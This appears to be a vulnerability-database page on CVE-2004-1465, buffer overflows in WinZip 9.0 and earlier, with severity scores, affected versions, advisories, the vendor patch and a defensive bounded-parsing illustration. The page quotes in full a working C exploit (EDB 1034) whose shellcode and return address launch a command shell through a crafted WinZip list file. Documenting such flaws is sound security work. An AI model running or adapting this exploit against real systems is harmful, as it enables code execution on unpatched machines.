CVE-2004-1465
CVSS 3.7
Published: 2004-12-31 00:00:00
Last revised: 2016-10-17 22:54:46
NMCOES    

[Original text] Multiple buffer overflows in WinZip 9.0 and earlier may allow attackers to execute arbitrary code via multiple vectors, including the command line.


[CNNVD] WinZip Unspecified Buffer Overflow Vulnerability (CNNVD-200412-348)

        
        WinZip is a popular compression and extraction utility.
        WinZip contains several unspecified security issues. A remote or local attacker can exploit them to cause buffer overflows and potentially execute arbitrary instructions on the system with the privileges of the process running WinZip.
        One issue is a buffer overflow in the handling of certain specially crafted files; the other is that a specially constructed WinZip command line can also trigger a buffer overflow. No detailed vulnerability information is currently available.
        

- CVSS (Base Score)

CVSS score: 3.7 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: HIGH [exploitation requires specific access conditions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (Affected Platforms and Products)

cpe:/a:winzip:winzip:8.1        WinZip 8.1
cpe:/a:winzip:winzip:9.0        WinZip 9.0
cpe:/a:winzip:winzip:8.0        WinZip 8.0
cpe:/a:winzip:winzip:7.0        WinZip 7.0
cpe:/a:winzip:winzip:8.1:sr1    WinZip 8.1 SR1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1465
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1465
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-348
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=109416099301369&w=2
(UNKNOWN)  BUGTRAQ  20040901 WinZip Unspecified Buffer Overflows May Let Remote or Local Users Execute Arbitrary Code
http://securitytracker.com/id?1011132
(PATCH)  SECTRACK  1011132
http://www.ciac.org/ciac/bulletins/o-211.shtml
(VENDOR_ADVISORY)  CIAC  O-211
http://www.securityfocus.com/bid/11092
(PATCH)  BID  11092
http://www.winzip.com/wz90sr1.htm
(PATCH)  CONFIRM  http://www.winzip.com/wz90sr1.htm
http://xforce.iss.net/xforce/xfdb/17192
(UNKNOWN)  XF  winzip-code-execution(17192)
http://xforce.iss.net/xforce/xfdb/17197
(UNKNOWN)  XF  winzip-command-line-bo(17197)

- Vulnerability Information

WinZip Unspecified Buffer Overflow Vulnerability
Severity: Low    Type: Boundary condition error
Published: 2004-12-31 00:00:00    Updated: 2005-10-20 00:00:00
Attack vector: Remote / Local


- Advisories and Patches

        Vendor patch:
        WinZip
        ------
        The vendor has released an upgrade that fixes this issue. Download WinZip 9.0 SR-1 from the vendor's site:
        
        http://www.winzip.com/wz90sr1.htm

- Vulnerability Information (1034)

WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit (EDBID:1034)
windows local
2005-06-07 Verified
0 ATmaCA
N/A
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
*
*/

/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>   /* strcpy, strcat */

#define NOP 0x90

int main(void)
{
        // create crafted command line: winzip32.exe -* /zipandmail /@<listfile>
        char tmpfile[] = "c:\\wzs45.tmp";
        char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
        char zipandmailpar[] = " -* /zipandmail /@  ";
        char runpar[300];
        int i = 0;
        strcpy(runpar,winzippath);
        strcat(runpar,zipandmailpar);
        strcat(runpar,tmpfile);

        // the list file needs some input file name on its first line; the file does not have to exist
        char inputfile[] = "C:\\someinputfile.ext\n";

        // launch a local cmd.exe via msvcrt!system("cmd.exe")
        char shellcode[] =
        "\x55\x8B\xEC\x33\xFF"
        "\x57\x83\xEC\x04\xC6\x45\xF8"
        "\x63\xC6\x45\xF9\x6D\xC6\x45"
        "\xFA\x64\xC6\x45\xFB\x2E\xC6"
        "\x45\xFC\x65\xC6\x45\xFD\x78"
        "\xC6\x45\xFE\x65\xB8"
        "\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
        "\x50\x8D\x45\xF8\x50"
        "\xFF\x55\xF4";

        // create crafted .tmp list file
        FILE *di;
        if( (di=fopen(tmpfile,"wb")) == NULL ){
                return 1;
        }

        // first line: the (nonexistent) input file name
        for(i=0;i<sizeof(inputfile)-1;i++)
                fputc(inputfile[i],di);

        // second line: drive prefix, NOP sled and shellcode, long enough to overflow the path buffer
        fprintf(di,"c:\\");

        for(i=0;i<384;i++)
                fputc(NOP,di);

        for(i=0;i<sizeof(shellcode)-1;i++)
                fputc(shellcode[i],di);

        // saved return address is overwritten with a jmp esp; execution lands on the bytes that follow,
        // where sub esp,0x74 / jmp esp jumps back down the stack into the NOP sled, which slides into the shellcode
        fprintf(di,"\xBF\xAC\xDA\x77");  //EIP - WinXp Sp2 Eng - jmp esp addr
        fprintf(di,"\x90\x90\x90\x90");  //NOPs
        fprintf(di,"\x90\x83\xEC\x74");  //sub esp,0x74
        fprintf(di,"\xFF\xE4\x90\x90");  //jmp esp

        fprintf(di,"\n");

        fclose(di);

        // run WinZip on the crafted list file
        WinExec(runpar,SW_SHOW);
        return 0;
}

// milw0rm.com [2005-06-07]
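The description above and the SecurityFocus discussion further down attribute the flaw to insufficient bounds checking, and EDB 1034 triggers it by handing WinZip a `/@` list file whose second line is a 400-plus-byte path. WinZip's source is not public, so what follows is an added C illustration of the pattern involved, not WinZip's code and not the exploit author's: a hypothetical list-file reader that copies each entry into a fixed stack buffer with `strcpy`, beside a bounded version that measures the entry first and rejects anything that does not fit, exercised on a constructed list file shaped like the exploit's (harmless first line, oversized second line). `PATH_BUF`, the 260-byte buffer size and all function names are assumptions.

```c
/* Added illustration, not WinZip's code (which is not public): a hypothetical
 * "/@listfile" reader showing the unbounded copy that a list entry like the
 * one EDB 1034 writes would overflow, next to a bounded reader that refuses
 * over-long entries. PATH_BUF and all function names are assumptions. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 260          /* assumed stack buffer size (Windows MAX_PATH) */
#define NOP 0x90

/* Vulnerable pattern: copy the entry with no length check. An entry longer
 * than PATH_BUF overwrites whatever lies above `path` on the stack, including
 * the saved return address, which is what the exploit's second line (drive
 * prefix, NOP sled, shellcode, jmp-esp address) relies on. Shown for contrast
 * only; this example never calls it on over-long input. */
int add_entry_unbounded(const char *entry)
{
    char path[PATH_BUF];
    strcpy(path, entry);                       /* no bound: the overflow */
    return (int)strlen(path);
}

/* Hardened pattern: check the length before touching the buffer, copy with
 * an explicit bound, and always terminate. */
int add_entry_bounded(const char *entry, size_t n, char out[PATH_BUF])
{
    if (n >= PATH_BUF)
        return -1;                             /* does not fit: reject */
    memcpy(out, entry, n);
    out[n] = '\0';
    return (int)n;
}

/* Parse an @listfile image: one entry per line ('\n' or "\r\n"), blank lines
 * ignored, at most `max` entries stored. Returns the number of accepted
 * entries, or minus the 1-based line number of the first over-long entry. */
int parse_listfile(const unsigned char *data, size_t len,
                   char (*out)[PATH_BUF], size_t max)
{
    size_t i = 0, count = 0;
    int lineno = 0;
    while (i < len && count < max) {
        size_t start = i;
        while (i < len && data[i] != '\n')
            i++;
        size_t end = i;
        if (i < len)
            i++;                               /* consume the '\n' */
        if (end > start && data[end - 1] == '\r')
            end--;                             /* tolerate CRLF */
        lineno++;
        if (end == start)
            continue;                          /* blank line */
        if (add_entry_bounded((const char *)data + start, end - start,
                              out[count]) < 0)
            return -lineno;
        count++;
    }
    return (int)count;
}

/* Constructed input shaped like the exploit's list file: a harmless first
 * line, then a second line of "c:\" followed by a 384-byte NOP sled and
 * sixteen 'X' bytes standing in for shellcode and return address. */
size_t build_crafted_listfile(unsigned char *buf, size_t cap)
{
    const char first[] = "C:\\someinputfile.ext\n";
    size_t n = 0, k;
    if (cap < sizeof first + 3 + 384 + 16 + 1)
        return 0;
    memcpy(buf, first, sizeof first - 1);  n += sizeof first - 1;
    memcpy(buf + n, "c:\\", 3);            n += 3;
    for (k = 0; k < 384; k++) buf[n++] = NOP;
    for (k = 0; k < 16; k++)  buf[n++] = 'X';
    buf[n++] = '\n';
    return n;
}

int main(void)
{
    unsigned char crafted[600];
    char entries[8][PATH_BUF];
    const unsigned char benign[] = "C:\\report.doc\r\nC:\\data\\notes.txt\n";

    int ok = parse_listfile(benign, sizeof benign - 1, entries, 8);
    printf("benign list: %d entries accepted\n", ok);

    size_t len = build_crafted_listfile(crafted, sizeof crafted);
    int bad = parse_listfile(crafted, len, entries, 8);
    printf("crafted list: result %d (negative = rejected line number)\n", bad);
    return 0;
}
```

Compiled stand-alone it reports 2 accepted entries for the benign list and -2 for the crafted one, meaning the oversized second line is refused before any copy happens. The unbounded variant is kept only for contrast; the program never feeds it the crafted line, and a real fix would delete it rather than leave it beside the bounded one.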
		

- Vulnerability Information

OSVDB 9511
WinZip Multiple Unspecified Overflows
Location: Unknown    Attack type: Input Manipulation
Impact: Loss of Integrity, Impact Unknown
Exploit: Public

- Vulnerability Description

Winzip contains flaws that may allow an attacker to execute various overflow attacks. No further details have been provided.

- Timeline

2004-09-01 Unknown
Unknown Unknown

- Solution

Upgrade to version 9.0 SR-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete

- Vulnerability Information

WinZip Multiple Unspecified Buffer Overflow Vulnerabilities
Class: Boundary Condition Error    BID: 11092
Remote: Yes    Local: Yes
Published: 2004-09-01 12:00:00    Updated: 2009-07-12 07:06:00
These issues were disclosed by the vendor.

- Affected Versions

WinZip WinZip 9.0
WinZip WinZip 8.1 SR-1
WinZip WinZip 8.1
WinZip WinZip 8.0
WinZip WinZip 7.0

- Not Affected Versions

WinZip WinZip 9.0 SR-1

- Discussion

WinZip is reported prone to multiple unspecified buffer overflow vulnerabilities. These issues may allow a remote or local attacker to potentially execute arbitrary code on a vulnerable computer. A successful attack may allow an attacker to gain unauthorized access to a computer. The problems likely occur due to insufficient bounds checking when processing zip archives.

A local buffer overflow vulnerability was reported as well. This issue can be triggered through the command line.

WinZip versions 9.0 and prior are affected by these issues.

Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

The vendor has released WinZip 9.0 SR-1 to address these issues.

- References

 

 

About the SCAP Chinese Community

SCAP中文社区 (SCAP Chinese Community) is the first Chinese-language open community focused on SCAP. For more information, see [About this site].

Copyright Notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are hosted on MITRE's websites.